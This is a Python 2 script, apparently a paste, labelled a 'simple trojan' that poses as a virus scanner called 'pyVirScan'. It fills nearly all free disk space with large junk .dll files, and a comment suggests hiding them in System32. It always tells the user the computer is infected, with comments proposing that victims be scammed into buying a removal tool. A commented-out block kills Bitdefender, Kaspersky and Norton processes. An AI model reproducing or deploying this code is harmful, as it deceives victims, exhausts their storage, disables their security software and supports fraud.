python - simple trojan

1. #python trojan for educational purposes
2. import win32file
3. import os
4. #i added this section to first kill avs
5. #a python script to kill process by its name
6. # kill_process.py
7. import os, signal
8.  
9. def check_kill_process(pstring):
10.     for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"):
11.         fields = line.split()
12.         pid = fields[0]
13.         os.kill(int(pid), signal.SIGKILL)
14. '''
15. check_kill_process("vvserv.exe")# bit defender process
16. check_kill_process("kav.exe")# kaspersky process
17. check_kill_process("norton.exe") # symantec process :) you get the drift hhehehe
18.  
19. '''
20. #end of kesh add
21. def get_drivestats():
22.     #This retrieves the amount of free space on the drive in bytes
23.     drive = os.path.splitdrive(os.getcwd())[0].rstrip(':')
24.     sectPerCluster, bytesPerSector, freeClusters, totalClusters = \
25.         win32file.GetDiskFreeSpace(drive + ":\\")
26.     free_space = freeClusters*sectPerCluster*bytesPerSector
27.     return free_space, drive
28. print ("-"*40)
29. print ("-" + " " * 9 + "Welcome to pyVirScan" + " " * 9 + "-")
30. print ("-" + " " * 2 + "A Virus Scanner written in Python!" + " " * 2 + "-")
31. print ("-" + " " * 13 + "Version 1.00" + " " * 13 + "-")
32. print ("-"*40)
33. print ("Be patient, you will be notified when the scan is complete")
34. #print ("Current Progress: 0.01%")
35.  
36. free_space, drive = get_drivestats()
37.  
38. #Convert free_space to kb and store in a variable
39. kb = float(1024)
40. kbFree = free_space / kb
41.  
42. #Find the amount of files you need to create to *almost* fill the drive
43. fillWithFloat = kbFree / 409600
44.  
45. #convert the amount of files needed to create from a
46. fillWithInt = int(round(fillWithFloat))
47. loopNum = 1
48.  
49.  
50.  
51. for y in range(fillWithInt):
52.     block = '0' * 409600
53.     #This saves the files to the current directory, but change it so that it changes it to System 32, so the victim can't find the file they are trying to delete!
54.     bigFile = file("sysscanresults" + str(loopNum) + ".dll", 'wb')
55.     for x in range(1000):
56.         bigFile.write(block)
57.     bigFile.close()
58.     #Didn't finish writing the percent complete function, you can uncomment and fix the lines of code if you want
59.     #percentComplete = loopNum * fillWithInt / 100
60.     #print ("Current Progress: " + str(percentComplete) + "%")
61.     loopNum += 1
62.  
63. #I don't know why I did this...
64. #Maybe so that you can give the source to someone who doesn't know python
65. #and get them to run it! so it looks more legitimate... mwahaha
66. if 1 == 1:
67.     virus = 1
68. if 1 != 1:
69.     virus = 0
70.  
71. print ("-"*40)
72. print (" " * 12 + "Scan Completed!")
73. print (" -"*20)
74. print ("Results:")
75. if virus == 1:
76.     #This will always be true, unless the source is edited
77.     #For scamming purposes you could tell them to buy a virus
78.     #removal tool or something of the like.
79.     print("The results were positive, your computer is infected.")
80.    
81.     #Yet to add the text file creation
82.     #print("To see the full list of results, navigate to C:\\results.txt")
83.     #print("In the text file you will see:")
84.     #print ("1) What you are infected by.")
85.     #print ("2) Details of each infection.")
86.     #print ("3) What you can do to remove the virus'.")
87.  
88. if virus == 0:
89.     print("Your computer is clean!")
90.  
91.  
92. print ("Thankyou for using pyVirScan")
93. print ("-"*40)
94. exit = raw_input("Press <enter> to exit...")